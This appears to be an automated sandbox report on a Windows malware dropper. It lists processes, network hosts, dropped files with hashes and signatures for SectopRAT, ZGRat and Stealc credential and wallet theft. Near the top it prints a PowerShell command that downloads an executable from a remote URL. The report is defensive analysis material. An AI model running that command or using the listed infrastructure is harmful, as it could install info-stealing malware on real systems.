C:\Users\Admin\AppData\Local\Temp\ufw.0.exe

"C:\Users\Admin\AppData\Local\Temp\ufw.0.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=1667','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\ufw.3.exe

"C:\Users\Admin\AppData\Local\Temp\ufw.3.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
IT 108.138.198.104:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.62:80 185.172.128.62 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:80 download.iolo.net tcp
FR 143.244.56.51:443 download.iolo.net tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
RU 91.215.85.66:15647 tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar81F5.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c735faf898918225eaaf94251a81ed15
SHA1 fadf5885dcf90dce782b384909a89c6aeede57e9
SHA256 e7819a037c7079f5eb9942599dd55a710748f7e75f4e2ee5f86052cf29e2a448
SHA512 b460f83477ac8807bac8c92c71acf886fde0b6923981cf59fa96c98c7ff04f6f2e7732939098151e813268d97ac472feb8d2a35501b1bbe0141ecbf357914c0f

C:\Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\lood.bat

MD5 75599c4a0c50b789c306880785ffa782
SHA1 31bb898b645b5616b2adf0a4718a9f24ce28e1c1
SHA256 fe26f8ca5512caeff7dffd12c2ffc11115850db0764a3ef9f943fa9f349e0a77
SHA512 b9ea2629a7f212aab59cb7a8bfdb684b1f23086b488b2a28b25784ad629c42dd8e71b4ef4927728df436a53c2f94d66013a166a407bcbc5dd6570c3b03fb31ad

memory/752-162-0x0000000002590000-0x00000000025D0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b4ee2d226ec2f920234ac360e43e08a7
SHA1 2e76a2232744732f9c524e7958e33c721e69e036
SHA256 b2715705a557de76fc29b054704e933e4d0d3ad5464b78a7ffc05e0c6df531be
SHA512 aae23494fa5d99bb7abda9f18734f6e061b46f79cc89938cf58a5d4a7c7c4d88df84aa44b37056bd8fa0dde2b033a0409e24f471e404521f4890eb7d4cb0cc18

\Users\Admin\AppData\Local\Temp\i1.exe

MD5 fdd3895eb388f733e4aabd00db54e6f7
SHA1 604978bd31d87066735e13343f26f80ce7f45706
SHA256 303ba93e0bb762a95859f5c94016e7cda0ace2fba811fb78e86af98baa2f3d01
SHA512 6b891f36976ec4f5bd8590215f191c43e93f69c19a83f2eab44ef5b2d17fbecc5531a05c2137c97164f0917bf5a0d41cb245760eb1544d83fa212d4a1d806756

C:\Users\Admin\AppData\Local\Temp\ufw.0.exe

MD5 f85ca7da4201921c93b98f6555f3d7b7
SHA1 523891e3e23bb45a52e402b6282f70f9e17cde9c
SHA256 eeaa177b0bc2d85cf8b416c2ed3b85fd50bd7c811bf41a32d161a10a767c2fda
SHA512 1b8220fe954799fbc43a702a1c508beff390c3f5a58e8e50e3c5ccce48459ec3a25df395f041f722cb67b0eb6c31013239f58a8b947e60344d15ce0c56e9cb17

C:\Users\Admin\AppData\Local\Temp\UFW1~1.ZIP

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\ufw.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\ufw.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\ufw.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/2612-341-0x00000000745E0000-0x0000000074754000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ufw.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/2612-342-0x0000000077B30000-0x0000000077CD9000-memory.dmp

memory/1632-348-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\Users\Admin\AppData\Local\Temp\ufw.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/572-385-0x0000000000400000-0x0000000001A3C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 4978aebe3b47dbe2dc682524251bf182
SHA1 5caf8904debf79fc69eac04680b5203851d462a0
SHA256 6e0871d2ff7b7795686d230c054b2285c2c0c28ef9f4a3c0f0573b18dab40c7a
SHA512 8410c75818c35e56eb0a148f39b2843f2a5528672d0ee1bf27d93a80707eb9b474db7733603190babd9fdd84b8ae840887e9f7ed605d657ba4690ecff36c24aa

memory/2612-414-0x00000000745E0000-0x0000000074754000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ebc139a

MD5 b9e1dc3641cb74ed0633561210fd7862
SHA1 c019ab6b2cbafa98539de387a3bd3a8f058bcf68
SHA256 2b35c8d463f1fe09c5de20478aff653e96c01e8261baa4be61cb9c8ec16b7970
SHA512 b597f9f9c8ee759133034e4c3f682d78db7780bd641787ace6a7e3c3709f480018ec54a3ea6659d30db1d0ebe598bab2dc40bfb207d7d37fb7af52e20fc8e341

memory/1632-423-0x0000000000400000-0x000000000083A000-memory.dmp

memory/328-424-0x0000000077B30000-0x0000000077CD9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 33592882a13cc34ba6fa816ba5924c03
SHA1 c81771a90391e3e187f7a7d4352ac74c12b0d7e2
SHA256 ee79e2fe9637793cffc06c535403ffb032ac5203d2863b267e0067c5504897b7
SHA512 2c0619c8236b8a5793f277d20a1420dfd1ef6cfa07922398f76598452b90605b99de927c1d1f50583992540af1a03cedacec2ae6938740308531e0734266c870

memory/1632-486-0x0000000000400000-0x000000000083A000-memory.dmp

memory/1532-487-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1532-489-0x0000000000400000-0x00000000008AD000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2800-504-0x0000000000F50000-0x0000000004848000-memory.dmp

memory/1632-514-0x0000000000400000-0x000000000083A000-memory.dmp

memory/2800-515-0x000000001ECE0000-0x000000001EDF0000-memory.dmp

memory/2800-516-0x0000000000470000-0x0000000000480000-memory.dmp

memory/2800-517-0x0000000000D40000-0x0000000000D4C000-memory.dmp

memory/2800-518-0x0000000000A50000-0x0000000000A64000-memory.dmp

memory/2800-519-0x000000001E5D0000-0x000000001E5F4000-memory.dmp

memory/2800-520-0x0000000000F40000-0x0000000000F4A000-memory.dmp

memory/2800-521-0x000000001E600000-0x000000001E62A000-memory.dmp

memory/2800-522-0x000000001F1D0000-0x000000001F282000-memory.dmp

memory/2800-523-0x000000001F280000-0x000000001F2FA000-memory.dmp

memory/2800-524-0x0000000000EB0000-0x0000000000F12000-memory.dmp

memory/2800-525-0x0000000000A20000-0x0000000000A2A000-memory.dmp

memory/328-526-0x00000000745E0000-0x0000000074754000-memory.dmp

memory/2800-530-0x000000001F850000-0x000000001FB50000-memory.dmp

memory/2800-532-0x0000000000A40000-0x0000000000A4A000-memory.dmp

memory/2800-533-0x0000000000D30000-0x0000000000D3A000-memory.dmp

memory/2800-534-0x0000000000F10000-0x0000000000F32000-memory.dmp

memory/2800-537-0x0000000000F30000-0x0000000000F3C000-memory.dmp

memory/2492-541-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2492-540-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2492-539-0x00000000730B0000-0x0000000074112000-memory.dmp

memory/2492-545-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2800-546-0x0000000000A40000-0x0000000000A4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp5571.tmp

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\81950f7e7cbd108086cf2da3a401afdfffc60d9b485aac5dd52f7a137c00f950\2b7f7c33bd734341bf343695fe849958.tmp

MD5 c46ed39cc1761b3f1db2ef34cbdaef01
SHA1 89dadbab3f1b4b5b1529e78371df7e69849312d1
SHA256 3037b509ee7ed08583de8526233c9cfd67ba102b1a8e96fc84f454b67a3d8cb1
SHA512 82417ff76c1ff25a318ca60004eea216b8248ab8888f01b013b19851cf707539cec33565794b733344b8a6d057c9d6364991d603e11893f27c6f35ce93ed21c5

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:24

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\i1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\u224.3.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4452 set thread context of 3400 N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 set thread context of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u224.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u224.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u224.3.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4888 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 4888 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 4888 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 3460 wrote to memory of 4556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 4556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 4556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3460 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3460 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3460 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.0.exe
PID 2668 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.0.exe
PID 2668 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.0.exe
PID 2668 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe
PID 2668 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe
PID 2668 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe
PID 3460 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4452 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.3.exe
PID 2668 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.3.exe
